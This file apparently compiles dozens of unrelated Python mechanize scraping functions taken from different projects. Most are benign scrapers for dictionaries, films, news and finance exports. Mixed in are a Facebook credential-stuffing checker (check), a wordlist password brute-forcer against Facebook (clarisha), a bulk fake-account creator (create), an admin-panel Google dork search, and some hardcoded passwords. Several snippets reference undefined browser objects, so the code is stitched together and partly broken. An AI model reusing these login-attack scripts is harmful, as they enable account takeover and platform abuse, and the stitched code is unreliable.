def get_data (): html = scraperwiki.scrape (edd_url) process_ex_dividend_data (html) br = Browser() br.set_handle_robots (False) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] br.open (edd_url) links = {} for link in br.links(): if link.text in ['2', '3', '4']: links [link.text] = link.url for k, link in links.items(): m = re.search (edd_pat, link) br = Browser() br.set_handle_robots (False) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] br.open (edd_url) br.select_form(nr=0) br.set_all_readonly(False) br["__EVENTTARGET"] = m.group(1) br["__EVENTARGUMENT"] = '' for c in br.controls: if c.type == 'submit': c.disabled = True response = br.submit() process_ex_dividend_data (response.read())
def get_browser(): # Browser br = Browser() # Cookie Jar #cj = cookielib.LWPCookieJar() #br.set_cookiejar(cj) # Browser options br.set_handle_equiv(True) br.set_handle_gzip(True) br.set_handle_redirect(True) br.set_handle_referer(True) br.set_handle_robots(False) # Follows refresh 0 but not hangs on refresh > 0 #br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) # Want debugging messages? # #br.set_debug_http(True) #br.set_debug_redirects(True) #br.set_debug_responses(True) # User-Agent (this is cheating, ok?) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] return br
def check(acs): for a in acs: try: a = a.rsplit()[0] except: pass try: if a: a = a.split(':') user = a[0] passw = a[1] br = Browser() br.set_handle_gzip(True) br.set_handle_robots(False) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] br.open('http://m.facebook.com/login.php') br.select_form(nr=0) br.form['email'] = user br.form['pass'] = passw br.submit() if 'm.facebook.com/login.php' in br.geturl() or 'checkpoint' in br.geturl() or 'to confirm your account with Facebook.' in br.response().read(): print "Could not login with " + str(a) else: print "Logged in with " + user opn = open(newfile, 'a') opn.write(user + ":" + passw + '\n') opn.close() except: print "Could not login with " + str(a)
def begin_scraper(): br = Browser() br.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8; rv:16:0) Gecko/20100101 Firefox/16.0')] br.set_handle_robots(False) br.open("https://wwws.mint.com/login.event") assert br.viewing_html() formcount=0 for f in br.forms(): if str(f.attrs["id"]) == "form-login": break formcount = formcount+1 br.select_form(nr=formcount) br["username"] = "******" #Put your username here br["password"] = getpass() #import pdb; pdb.set_trace() # Submit the user credentials to login to mint response = br.submit() response = br.follow_link(text="Transactions") links_to_transactions = br.links(text_regex="Export all \d+ transactions") link = "" for f in links_to_transactions: link = f response2 = br.follow_link(link) text_file = open("transactions.csv", "w") text_file.write(response2.read()) text_file.close()
def github_connect(path=""): """Connect to the website""" br = Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'Firefox')] br.open('https://github.com/%s' % path) return br
def login(url): # Use mechanize to get the set name URLs to scrape br = Browser() br.addheaders = [('User-Agent', ua)] br.open(url) # Select the form for form in br.forms(): if form.attrs['id'] == 'loginFrm': br.form = form break br["email"] = EMAIL # replace with email br["password"] = PASSWORD # replace with password # Submit the form br.submit() for form in br.forms(): if form.attrs['id'] == 'pop_report_form': br.form = form break br['sport_id'] = ['185223'] br['set_name'] = "T206" br.submit(name="search") # Follow link to the correct set br.follow_link(url="http://www.beckett.com/grading/set_match/3518008") return br.response().read()
def returnMnemonics(var): from mechanize import Browser from bs4 import BeautifulSoup # var = "abase" br = Browser() br.set_handle_robots(False) br.set_handle_equiv(False) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] url= 'http://mnemonicdictionary.com/?word=' + str(var) br.open(url) soup_mn = BeautifulSoup(br.response().read()) # <div style="padding-top: 10px;"> count_mn=0 mnemonics="" for i in soup_mn.find_all('div',{'style':'padding-top: 10px;'}): soup2 = BeautifulSoup(str(i)) for x in soup2.find_all('div', {'class':'row-fluid'}): soup3 = BeautifulSoup(str(x)) for y in soup3.find_all('div', {'class':'span9'}): count = 0 # print count_mn if count_mn==3: break count_mn = count_mn+1 if y is not None: for z in y: if count == 2: # print z mnemonics = mnemonics+z.strip().replace(','," ").replace('\n', '').replace(".","")+"," count = count+1 return mnemonics
def get_browser(self): """ Each FAUrl object stores it's own browser instance. On the first call it is created and if the username and password is set it will authenticate you. :return: mechanize.Browser instance. :raise: FAiler.FAError if FA is down. Time to F5! :raise: FAiler.FAAuth Your username and password failed """ if self._br is None: br = Browser() br.set_handle_robots(False) br.set_handle_redirect(True) br.set_handle_referer(True) br.set_handle_equiv(True) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] if self._username is not None and self._password is not None: loginPage = 'https://www.furaffinity.net/login' try: br.open(loginPage) except urllib2.HTTPError: raise FAError("FA's down, F5 time.") br.form = br.global_form() br.form['name'] = self._username br.form['pass'] = self._password br.form.method = 'POST' br.submit() if br.geturl() == loginPage + '/?msg=1': raise FAAuth('Username & Password Incorrect') self._br = br return self._br
def respond(permalink, text): br = Browser() user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1' br.addheaders = [('User-agent', user_agent)] soup = BeautifulSoup(br.open(permalink).read()) urlopen = urllib2.urlopen Request = urllib2.Request encode = urllib.urlencode cj = cookielib.LWPCookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) root_comment = soup.find('form', attrs={'class': 'usertext border'}) thing_id = root_comment.find('input', attrs={'name': 'thing_id'})['value'] print 'thing_id', thing_id # LOG THE F**K IN req = Request('http://www.reddit.com/api/login/username', encode({'user': '******', 'passwd': 'hackny', 'api_type': 'json'}), {'User-Agent': user_agent}) req_open = urlopen(req) read = json.loads(req_open.read()) modhash = read['json']['data']['modhash'] # POST THE F*****G COMMENT req = Request('http://www.reddit.com/api/comment', encode({'thing_id': thing_id, 'text': text + '\n\n*This is an automated response.*', 'uh': modhash}), {'User-Agent': user_agent}) req_open = urlopen(req) read = json.dumps(req_open.read())
def scrap_query(query, bang=None): r = ddg_query('imbd ' + query, bang=bang) if 'redirect' in dir(r) and 'primary' in dir(r.redirect): url = r.redirect.primary else: logger.info('Could not find imdb searchpage from DuckDuckGo bang') return None br = Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.2;\ WOW64) AppleWebKit/537.11 (KHTML, like Gecko)\ Chrome/23.0.1271.97 Safari/537.11')] r = br.open(url) soup = BeautifulSoup(r) for link in soup.find_all('a'): href = link.get('href','') match = re.search(r"imdb\.com/.*tt(?P<number>[^/]*)", href) if match: imdb_id = check_imdb(match.group('number')) return imdb_id return None
def createbrowser(self): br = Browser() br.set_handle_gzip(True) br.set_handle_robots(False) br.set_handle_redirect(True) br.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1 like Mac OS X; en-US) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3')] return br
def scrape_info(): browser = Browser() browser.set_handle_robots(False) browser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] parkIds = [] for name in config['names']: browser.open("https://www.recreation.gov") browser.select_form(nr=0) browser['locationCriteria'] = name response = browser.submit() content = response.read() soup = BeautifulSoup(content, 'html.parser') scripts = soup.select('script') for script in scripts: if 'SuggestedPlaces' in str(script): jsonStr = str(script).strip('<script>var SuggestedPlaces = ').strip(';</script>') places = json.loads(jsonStr) query = urlparse.parse_qs(places[0]['value']) if 'parkId' in query: print('FOUND!: ' + unicode(query['parkId'][0])) parkIds.append(unicode(query['parkId'][0])) else: print('No results for ' + name + ': ' + places[0]['value']) pprint(parkIds)
def searchTitle(rawtitle): br = Browser() # Ignore robots.txt br.set_handle_robots( False ) # Google demands a user-agent that isn't a robot br.addheaders = [('User-agent', 'Firefox')] br.open( "http://www.google.com " ) br.select_form( 'f' ) s='imdb'+' + '+' '.join(re.compile('[\.]').split(rawtitle)) br.form[ 'q' ] = s br.submit() resp = None for link in br.links(): siteMatch = re.compile( 'www.imdb.com/title/tt[0-9]*/$' ).search( link.url ) if siteMatch: resp = br.follow_link( link ) print link.url break soup = BeautifulSoup(resp.get_data()) title = re.sub(' - IMDb','',soup.find('title').string) title = re.sub('\([0-9]*\)','',title) return title
def generateSentence(var): br = Browser() br.set_handle_robots(False) br.set_handle_equiv(False) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] url= 'http://www.oxforddictionaries.com/definition/english/' + str(var) # url= 'https://www.google.co.in/search?q=define+utilitarian' try: br.open(url) except: print "what word is this, man? " + var return soup = BeautifulSoup(br.response().read()) sentence="" counter=0 for i in soup.find_all('ul',{'class':'sentence_dictionary'}): if i is not None: soup2 = BeautifulSoup(str(i)) for j in soup2.find_all('li',{'class':'sentence'}): if j is not None: sentence = sentence + str(counter+1)+") "+j.string.replace(',',' ').strip()+"\n" counter+=1 if counter == 2: return sentence return sentence
def process(time): br = Browser() # Ignore robots.txt br.set_handle_robots( False ) # Google demands a user-agent that isn't a robot br.addheaders = [('User-agent', 'Firefox')] br.open("http://heasarc.gsfc.nasa.gov/cgi-bin/Tools/xTime/xTime.pl") br.select_form("form") br["time_in_i"] = time # Enter your time in here in the format "2015-06-27 04:23:23.68" response=br.submit() html=response.read() soup = BeautifulSoup(html) table =soup.find("table", border=5) g = table.findAll('tr') row= g[7] #Select the correct row cols = row.findAll('td') value = cols[1].string #This is the MET time return value
def testPx(px): B=Browser() B.addheaders = [('User-agent', userAgents[randint(0,len(userAgents)-1)])] B.set_proxies(px) try: B.open('http://graphicriver.net/',timeout=5) pxQ.put(px) print(px['http']+" ok") B.open('http://graphicriver.net/category/all',timeout=5) except: print(px['http']+" error") page = pageQ.get() try: # pass # finally: count=0 while(count<5): O = B.open('http://graphicriver.net/category/all?page='+str(page),timeout=8) turls = lxml.html.document_fromstring(O.get_data()).xpath('//div[@class="item-info"]/h3/a/@href') for url in turls: urlsQ.put(url) print(str(page)+" got") pageDoneQ.put(page) page = pageQ.get() count+=1 except: pageQ.put(page) print(str(page)+" error")
def login_url( url, login, passwd, form_nomber, login_name, paswd_name, submit_nomber ): br = Browser(); showMessage('Создаю интерфейс браузера') cj = cookielib.LWPCookieJar() br.set_cookiejar(cj) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] br.open(url); showMessage('Загружаю сайт и произвожу вход') br.select_form(nr = form_nomber) br[login_name] = login br[paswd_name] = passwd res = br.submit(nr = submit_nomber) content = res.read() #определить число страниц maxPage = int(max_page(content)); showMessage('Определяю количество страниц и перехожу на последнюю') curPage = 84 while curPage < maxPage: res = br.open('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage)) curPage = maxPage maxPage = int(max_page(content)) content = res.read() #парсинг ключей if get_all_keys(content): webbrowser.open_new_tab('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage)) # Вернет True и откроет вкладку
def getRandomXKCDComic(urlBase): br = Browser() br.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9')] br.set_handle_robots(False) #XKCD Comics are enumerated in the following type by URL: http://www.xkcd.com/1, http://www.xkcd.com/2, ..., http://www.xkcd.com/n upperBound = 1 lowerBound = 1 #Multiply by two until address no longer exists while True: link = urlBase + str(upperBound) + "/" try: response = br.open(link) except: break lowerBound = upperBound upperBound = upperBound * 2 #Binary Search for last Comic while True: pivot = (upperBound + lowerBound)/2 link = urlBase + str(pivot) + "/" if lowerBound == upperBound or pivot == lowerBound: randomComicID = random.randint(1, pivot) randPageLink = urlBase + str(randomComicID) + "/" return br.open(randPageLink) try: response = br.open(link) lowerBound = pivot except: upperBound = pivot
def get_machines(start,num_pages): mech = Browser() mech.set_handle_robots(False) mech.set_handle_equiv(False) mech.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] machines = [] try: page_num = 0 for page_num in range(start,num_pages+1): print("page %d" % (page_num)) url = "http://www.pinpedia.com/machine?page=%d" % page_num html_page = mech.open(url) html = html_page.read() machines += parse_page(html) time.sleep(0.1) except Exception as e: print e print("finished at page %s" % page_num) print("storing machines to machines.txt") with open('machines.txt','w') as fh: for machine in machines: fh.write(machine + "\n")
def google(self): print("\n\t[!] Searching on Google...\n") if self.dork == None: query = "site:" + self.target.replace("http://", "").replace("https://", "") + " inurl:(login||adm||admin||admin/account||controlpanel||adminitem||adminitems||administrator||administration||admin_area||manager||letmein||superuser||access||sysadm||superman||supervisor||control||member||members||user||cp||uvpanel||manage||management||signin||log-in||log_in||sign_in||sign-in||users||account)" else: query = "".join(self.dork) query = query.strip("'") print("[DORK] >> " + query) try: query = query.replace(" ", "+") req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query br = Browser() br.set_handle_robots(False) br.addheaders = [("User-agent", "chrome")] html = br.open(req).read() soup = BeautifulSoup(html, "html5lib") with open("./output/google-%s.txt" % self.target[8:], "w") as log: for results in soup.findAll(attrs={"class":"g"}): for title in results.findAll("h3", attrs={"class":"r"}): t = title.text t = t.title() for link in results.findAll(attrs={"class":"s"}): l = link.cite.text print (t) print (l + '\n') log.write(str(l) + '\n') except Exception as e: print(e)
def fetchFromBaidu(): browser = Browser(history = NoHistory()) browser.set_handle_robots(False) browser.addheaders = USER_AGENT page = browser.open(url) browser.select_form(name="f1") browser['word'] = "西洋美人" page = browser.submit() if 'Redirecting' in br.title(): resp = br.follow_link(text_regex='click here') soup = bs(page.read()) for image in soup.findAll("img"): try: print "Image: %(src)s" % image filename = image["src"].split("/")[-1] if fnmatch("*.jpg", filename) or fnmatch("*.jpeg", filename): parsed[2] = image["src"] outpath = os.path.join(out_folder, filename) if image["src"].lower().startswith("http"): urlretrieve(image["src"], outpath) else: urlretrieve(urlparse.urlunparse(parsed), outpath) except KeyError: continue
def __init__(self, config): self.login_url = 'http://%s.ogame.gameforge.com/' % config.country # http://s114-br.ogame.gameforge.com/game/index.php?page=overview self.index_url = 'http://s%s-%s.ogame.gameforge.com' % (config.universe, config.country) + '/game/index.php' headers = [('User-agent', 'Mozilla/5.0 (Windows NT 10.0; WOW64) \ AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36')] # Authentication data self.username = config.username self.password = config.password self.universe = config.universe self.country = config.country self.logger = logging.getLogger('ogame-bot') # Setting up the browser self.cj = cookielib.LWPCookieJar() br = Browser() br.set_cookiejar(self.cj) br.set_handle_robots(False) br.addheaders = headers # self.path = os.path.dirname(os.path.realpath(__file__)) # name of the cookies file # self.cookies_file_name = os.path.join(self.path, 'cookies.tmp') self.cookies_file_name = 'cookies.tmp' super(AuthenticationProvider, self).__init__(br, config)
def create(): while 1: try: br = Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] br.open('https://classic.netaddress.com/tpl/Subscribe/Step1?Locale=en&AdInfo=&Referer=http%3A%2F%2Fwww.netaddress.com%2F&T=1332304112864372') br.select_form(name='Step1') userid = randomname() br.form['usrUserId'] = userid pwd = randomname() br.form['newPasswd'] = pwd br.form['RPasswd'] = pwd br.form['usrFirst'] = randomname() br.form['usrLast'] = randomname() br.form['usrTimeZone'] = ['Africa/Abidjan'] br.form['usrCn'] = ['AF'] br.submit() print "Created " + userid + " with password " + pwd filo = open(filex, 'a') filo.write(userid + "@usa.net" + ":" + pwd + "\n") filo.close() except: print "error"
def get_google_news_by_url(url): # Construct browser object browser = Browser() ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36' browser.addheaders = [('User-Agent', ua), ('Accept', '*/*')] # Do not observe rules from robots.txt browser.set_handle_robots(False) # Create HTML document html = fromstring(browser.open(url).read()) # get number of pages xpath_pages = '//a[@class="fl"]' page_num = len(html.xpath(xpath_pages)) + 1 # get all pages url urls = generate_url_pages(url, page_num) print 'On ' + str(len(urls)) + ' pages:' df = [None] * page_num # iterate through all pages of this url for index, url in enumerate(urls): page_html = fromstring(browser.open(url).read()) df[index] = get_google_news_in_page(page_html) return pd.concat(df, ignore_index=True)
def find_first_article(): mech = Browser() cj = cookielib.LWPCookieJar() mech.set_handle_equiv(True) # mech.set_handle_gzip(True) mech.set_handle_redirect(True) mech.set_handle_referer(True) mech.set_handle_robots(False) # mech.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) mech.addheaders = [ ( "User-agent", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1", ) ] page = mech.open("https://bitcointalk.org/index.php?board=77.0") html = page.read() soup = BeautifulSoup(html) first_article_tag = soup.find("td", class_="windowbg") global startingpost startingpost = first_article_tag.span.a.get("href") print startingpost
def scrape(self): """ Opens the html page and parses the pdf links. """ browser = Browser() #----------- user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' values1 = {'name' : 'Michael Foord', 'location' : 'Northampton', 'language' : 'Python' } headers = { 'User-Agent' : user_agent } browser.set_handle_redirect(True) browser.set_handle_referer(True) browser.set_handle_robots(False) browser.addheaders = [('User-Agent', 'Firefox')] #------------- browser.set_handle_robots(False) html = browser.open(self.site) lines = html.read().splitlines() for line in lines: urls = re.findall('<a href="?\'?([^"\'>]*)', line) for url in urls: if '.pdf"' in url: self.pdf_urls.append(url)
def extract_article_url(posturl): mech = Browser() cj = cookielib.LWPCookieJar() mech.set_handle_equiv(True) # mech.set_handle_gzip(True) mech.set_handle_redirect(True) mech.set_handle_referer(True) mech.set_handle_robots(False) # mech.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) mech.addheaders = [ ( "User-agent", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1", ) ] page = mech.open(posturl) html = page.read() global soup soup = BeautifulSoup(html) global articleURL # print soup.prettify() for item in soup.find_all("div", class_="post"): for link in item.find_all("a"): string = link.get("href") if prog.match(string): # find the link that is to the article (link outside of bitcointalk.org forum) articleURL = link.get("href") return link.get("href") return "No article url"
def parseFeeds(self): mech = Browser() mech.addheaders = [ ('User-agent', 'Mozilla/5.0 (compatible)') ] mech.set_handle_robots(False) for url in self.feedUrls: #url = "http://feeds.feedburner.com/PurdueEngNews?format=xml" page = mech.open(url) html = page.read() soup = BeautifulStoneSoup(html) headlines = [] descriptions = [] i=0 self.newsList = [] for item in soup.findAll('item'): if (i > 20): break date = item.find('pubdate') title = item.find('title') link = item.find('link') desc = item.find('description') if (len(title.contents) > 0): title2 = title.contents[0] else: title2 = 'None' self.newsList.append(NewsStory(date.contents[0], title2, link.contents[0], \ desc.contents[0])) i+=1 for story in self.newsList: headlines.append(story.title) descriptions.append(story.link) #story.display() self.headlineList.append(headlines) self.descList.append(descriptions) self.populateTopicList()
def google(query): print("\n\t[!] Searching on Google...\n") print("[QUERY] >> " + query) try: query = query.replace(" ", "+") req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query br = Browser() br.set_handle_robots(False) br.addheaders = [("User-agent", "chrome")] html = br.open(req).read() soup = BeautifulSoup(html, "html5lib") with open("./output/google-%s.txt" % query[8:], "w") as log: for results in soup.findAll(attrs={"class": "g"}): for title in results.findAll("h3", attrs={"class": "r"}): t = title.text t = t.title() for link in results.findAll(attrs={"class": "s"}): l = link.cite.text print(t) print(l + '\n') log.write(str(l) + '\n') except Exception as e: print(e)
def cmdlogin(account,username,password,verbose):#login function for cmd tools #Actually this code applies only to otenet logins. testfoo=Browser() testfoo.set_handle_robots(False) login_page=acc_openlogin[str(account)]#find url foobar.addheaders = [("User-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)")]#add eaders testfoo.addheaders = [("User-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)")]#add headers try: if verbose: print "Opening url --> "+login_page foobar.open(login_page)#open url except: sys.exit("ERROR: Check your internet connection and try again...") if verbose: print "Connection established" if account=="otenet": foobar.select_form(name="loginform") elif account!="otenet": foobar.select_form(nr=0) if account == "voipbuster": foobar["login[username]"] = username foobar["login[password]"] = password elif account != "forthnet": foobar["username"] = username foobar["password"] = password else: foobar["Username"] = username foobar["Password"] = password try: if verbose: print "Verifying data..." foobar.submit() except: sys.exit("ERROR: Check your internet connection and try again...") time.sleep(2) #create a small delay ok=0 testfoo=foobar repeat=0 while repeat<=2:# Do 3 login attemps just in case there is a network error or smth try: time.sleep(1) leftcred=creditsleft(account,testfoo,verbose) break except: repeat=repeat+1# increase login attemps if repeat <= 3: if verbose: print "Retrying to login...("+str(repeat)+"/3)" else:# in case all of them failed sys.exit("Cannot login to "+account+". Invalid credentials or network error. Please try again :-)") if verbose: print "Logged in to "+account if account=="otenet" or account =="forthnet": print "SMS left: "+str(leftcred) elif account!="otenet" and account!="forthnet": print "Credits left: "+str(leftcred) if leftcred<="0.03": sys.exit("You cant send more messages today :-(") return leftcred
def open_browser(url): ''' INPUT: string containing url to open OUTPUT: browser object open the requested page and return a browser object ''' br = Browser() # Initialize browser object br.addheaders = [('User-agent', 'Firefox')] br.open(url) # Retrieve the requested page br.select_form(nr=0) return br
def get_data_urls(url): br = Browser() br.set_handle_robots( False ) br.addheaders = [('User-agent', 'Firefox')] # Retrieve the Google home page, saving the response br.open(url) data_urls = [] for link in br.links(url_regex="ssl.berkeley.edu"): data_urls.append(link.url) return data_urls
def no_js_get_source(self): br = Browser() br.set_handle_equiv(True) br.set_handle_referer(True) br.set_handle_robots(False) br.set_cookiejar(LWPCookieJar()) br.addheaders = [('User-agent', USER_AGENT)] br.set_handle_refresh(_http.HTTPRefreshProcessor(), max_time=10) try: return br.open(self.url).read() except: exit('[!] Failed to fetch html source')
def getRoundPage(self, i): br = Browser() br.addheaders = [('User-agent', 'Firefox')] br.open(self.url) if i is not None: br.select_form(name="selectRound") br['selCount'] = [str(i)] br.submit() else: i = 0 soup = BeautifulSoup(br.response().read(), features='html.parser') return soup
def query_timetree(taxon_a, taxon_b): '''Mechanize is used to query the webinterface of timetree with two taxa and returns the result page after submiting the query form.''' br = Browser() br.addheaders = [('User-agent', 'Firefox')] br.set_handle_robots(False) br.open("http://timetree.org") br.select_form(name="query_frm") br['taxon_a'] = taxon_a br['taxon_b'] = taxon_b resp = br.submit() html = resp.get_data() return html
def test(): from mechanize import Browser USER_AGENT = "Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.8.1.9) Gecko/20071102 Pardus/2007 Firefox/2.0.0.9" br = Browser() br.addheaders = [("User-agent", USER_AGENT)] url = "https://login.yahoo.co.jp/config/login?.src=&.done=http%3A//www.yahoo.co.jp/" br.open(url) br.select_form("login_form") br['login'] = "******" br['passwd'] = "877877" response = br.submit() print response.read()
def ma_dv_hotline(cityName): br = Browser() br.set_handle_robots(False) # ignore robots br.set_handle_refresh(False) # can sometimes hang without this br.addheaders = [('User-agent', 'Firefox')] br.open("https://findhelp.janedoe.org/find_help/search") br.select_form(id="searchprograms") br["city"] = [cityName] response = br.submit() cleanResponse = response.read().decode( "utf-8") #get rid of bytes-type error and white space cleanResponse = cleanResponse.replace('<!DOCTYPE html>', '') return cleanResponse
def read_all_result_page_links_for(mainurl): br = Browser() br.set_handle_robots(False) br.addheaders = [( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' )] br.open(mainurl) nice_links = [l for l in br.links() if 'company' in l.url] for link in nice_links: read_detail_page(link.url)
def _download_metadata(): # does *NOT* work because of nasty javascript # probably need to use selenium from mechanize import Browser br = Browser() br.addheaders = [ ('User-agent', 'Firefox') ] br.set_handle_robots(False) br.open('http://mdgs.un.org/unsd/mdg/Metadata.aspx') br.follow_link(text='Flat View') assert br.viewing_html() out = br.response().read() # TODO: extract option list and then clean up return out
def downloadAll(username, courseName): br = Browser() br.addheaders = [( 'User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9' )] br.set_handle_robots(False) br.open('https://myvideosu.stanford.edu/oce/currentquarter.aspx') assert br.viewing_html() br.select_form(name='login') br['username'] = username br['password'] = getpass() # Open the course page for the title you're looking for print 'Logging in to myvideosu.stanford.edu...' response = br.submit() print 'Logged in, going to course link.' response = br.follow_link(text=courseName) # Build up a list of lectures. print 'Loading video links.' links = [] for link in br.links(text='WMP'): links.append(re.search(r"'(.*)'", link.url).group(1)) # So we download the oldest ones first. links.reverse() print 'Found %d links, getting video streams.' % len(links) videos = [] for link in links: response = br.open(link) soup = BeautifulSoup(response.read()) video = soup.find('object', id='WMPlayer')['data'] video = re.sub('http', 'mms', video) video = video.replace(' ', '%20') # remove spaces, they break urls output_name = re.search(r'[a-z]+[0-9]+[a-z]?/[0-9]+', video).group(0).replace('/', '_') output_wmv = output_name + '.wmv' print video videos.append((video, output_wmv)) print 'Downloading %d video streams.' % (len(videos)) for video in videos: download(video) print 'Done!'
def DownloadPage(url, headers=None): if headers == None: headers = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] else: pass from mechanize import Browser, _http br = Browser() br.set_handle_robots(False) br.addheaders = headers page = br.open(url) return page.read()
def login(): br = Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'Chrome')] br.open("https://auth.tdameritrade.com") br.select_form(id="authform") br.form['su_username'] = "******" br.form['su_password'] = "******" no_url = br.submit() url = no_url.geturl() return url
def clarisha(): try: br = Browser() # Super Hidden Browser c = cookielib.LWPCookieJar() # Variable For CookiesJar # Other Options Must Be Set br.set_handle_robots(False) br.set_handle_equiv(True) br.set_handle_referer(True) br.set_handle_redirect(True) br.set_cookiejar(c) # Seting Up Cookies br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) # Refresh headers = [("User-agent",'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1' )] br.addheaders = headers # Seting Up User-Agent user_name = raw_input( 'Enter UserName / Email >> ') wordlist = raw_input('Enter Passwords List >> ') try: open(wordlist,'r') except IOError: octa() print(NGENTOT+'No Such File or Directory >> %s'%(wordlist)+ENDC) print('\n') clarisha() octa() wordlist = open(wordlist, 'r') # Opening Passwords List in Read Mode for password in wordlist: # Taking Each Password on the List password = password.rstrip('\n') br.open('https://www.facebook.com/login.php') # Open Login Facebook URL # Seting Some Option ('HTML Options') br.select_form(nr=0) br.form['email'] = user_name br.form['pass'] = password br.submit() url = br.geturl() if url == 'https://www.facebook.com/login.php' or url == 'https://www.facebook.com/login.php?login_attempt=1&lwv=100': print(NGENTOT + 'Password Not Correct %s'%(password)) elif url == 'https://www.facebook.com/' or url == 'https://www.facebook.com/?sk=welcome' or url == 'https://www.facebook.com/checkpoint/?next': print('\n') print('+------------------------------------------|') print(' | Password Found : %s'%(MUKIDI+password+ENDC) + '|') print('+------------------------------------------|') print('\n') exit(0) except KeyboardInterrupt: time.sleep(1) octa() print(NGENTOT+'Exiting =)') print('\n') sys.exit(0)
def download(): b=Browser() b.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] r1=b.open(URL) b.select_form(nr=0) b.set_all_readonly(False) b["__EVENTTARGET"] = "ctl00$CPH1$dgMain" b["__EVENTARGUMENT"] = "Page$2" b.find_control("ctl00$CPH1$tbSearch").disabled=True r2=b.submit() return [r1,r2]
